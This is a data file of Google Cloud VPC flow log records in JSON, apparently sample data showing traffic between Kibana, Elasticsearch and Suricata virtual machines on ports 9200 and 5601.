-{"insertId":"bnj3cofh3cdk4","jsonPayload":{"bytes_sent":"60222","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33534},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597279654Z","packets_sent":"361","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075756033Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_na
me":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdkf","jsonPayload":{"bytes_sent":"61810","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33510},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"358","reporter":"SRC","rtt_msec":"16","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500418290Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdkl","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":58216},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:36.982303071Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:36.865198297Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdk2","jsonPayload":{"bytes_sent":"136558","connection":{"dest_ip":"10.87.40.76","dest_port":33510,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"243","reporter":"DEST","rtt_msec":"16","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500418290Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwor
k_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdko","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"198.51.100.107","dest_port":34906,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:50.757255245Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:50.642206049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdke","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.27","dest_port":52454,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:40.888804332Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:40.779893091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdka","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":34090},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:37.827345444Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:37.712749588Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdkn","jsonPayload":{"bytes_sent":"170396","connection":{"dest_ip":"10.87.40.76","dest_port":33530,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565300944Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140119099Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork
_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdk5","jsonPayload":{"bytes_sent":"171610","connection":{"dest_ip":"203.0.113.134","dest_port":33570,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821129119Z","packets_sent":"71","reporter":"SRC","rtt_msec":"230","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469473010Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdk6","jsonPayload":{"bytes_sent":"15186","connection":{"dest_ip":"203.0.113.134","dest_port":33858,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933164456Z","packets_sent":"75","reporter":"SRC","rtt_msec":"253","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458515996Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"y4wffpfk2ero3","jsonPayload":{"bytes_sent":"208416","connection":{"dest_ip":"203.0.113.134","dest_port":33590,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565116665Z","packets_sent":"249","reporter":"SRC","rtt_msec":"109","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147151100Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2eroh","jsonPayload":{"bytes_sent":"90977","connection":{"dest_ip":"192.0.2.177","dest_port":60108,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:54.108975753Z","packets_sent":"357","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.762958327Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2erom","jsonPayload":{"bytes_sent":"187301","connection":{"dest_ip":"203.0.113.134","dest_port":33536,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565156020Z","packets_sent":"242","reporter":"SRC","rtt_msec":"194","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150481417Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2ero9","jsonPayload":{"bytes_sent":"139106","connection":{"dest_ip":"10.87.40.76","dest_port":33560,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"244","reporter":"DEST","rtt_msec":"11","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075859688Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2erog","jsonPayload":{"bytes_sent":"1733360","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.0.2.177","src_port":60108},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:54.108975753Z","packets_sent":"708","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.762958327Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2ero7","jsonPayload":{"bytes_sent":"149157","connection":{"dest_ip":"203.0.113.134","dest_port":33874,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933099658Z","packets_sent":"74","reporter":"SRC","rtt_msec":"142","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.513551480Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2eroe","jsonPayload":{"bytes_sent":"11108","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965119632Z","packets_sent":"95","reporter":"DEST","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480430427Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2eroa","jsonPayload":{"bytes_sent":"67337","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33590},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565116665Z","packets_sent":"351","reporter":"DEST","rtt_msec":"109","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147151100Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2eroi","jsonPayload":{"bytes_sent":"136375","connection":{"dest_ip":"10.87.40.76","dest_port":33538,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"246","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2ero8","jsonPayload":{"bytes_sent":"181424","connection":{"dest_ip":"203.0.113.134","dest_port":33690,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393929808Z","packets_sent":"241","reporter":"SRC","rtt_msec":"196","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075867049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2erol","jsonPayload":{"bytes_sent":"9303","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33874},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933099658Z","packets_sent":"94","reporter":"DEST","rtt_msec":"142","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.513551480Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2ero4","jsonPayload":{"bytes_sent":"142871","connection":{"dest_ip":"203.0.113.134","dest_port":33572,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821149051Z","packets_sent":"77","reporter":"SRC","rtt_msec":"335","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470754779Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2eror","jsonPayload":{"bytes_sent":"158811","connection":{"dest_ip":"203.0.113.134","dest_port":33968,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965119632Z","packets_sent":"69","reporter":"SRC","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480430427Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2erob","jsonPayload":{"bytes_sent":"13455","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33880},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821047175Z","packets_sent":"81","reporter":"DEST","rtt_msec":"252","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470071135Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2erox","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.12","dest_port":57300,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:22.156322353Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:22.044604322Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eroc","jsonPayload":{"bytes_sent":"71014","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65315},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220720811Z","packets_sent":"728","reporter":"DEST","rtt_msec":"210","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.844068405Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2erok","jsonPayload":{"bytes_sent":"60749","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33538},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
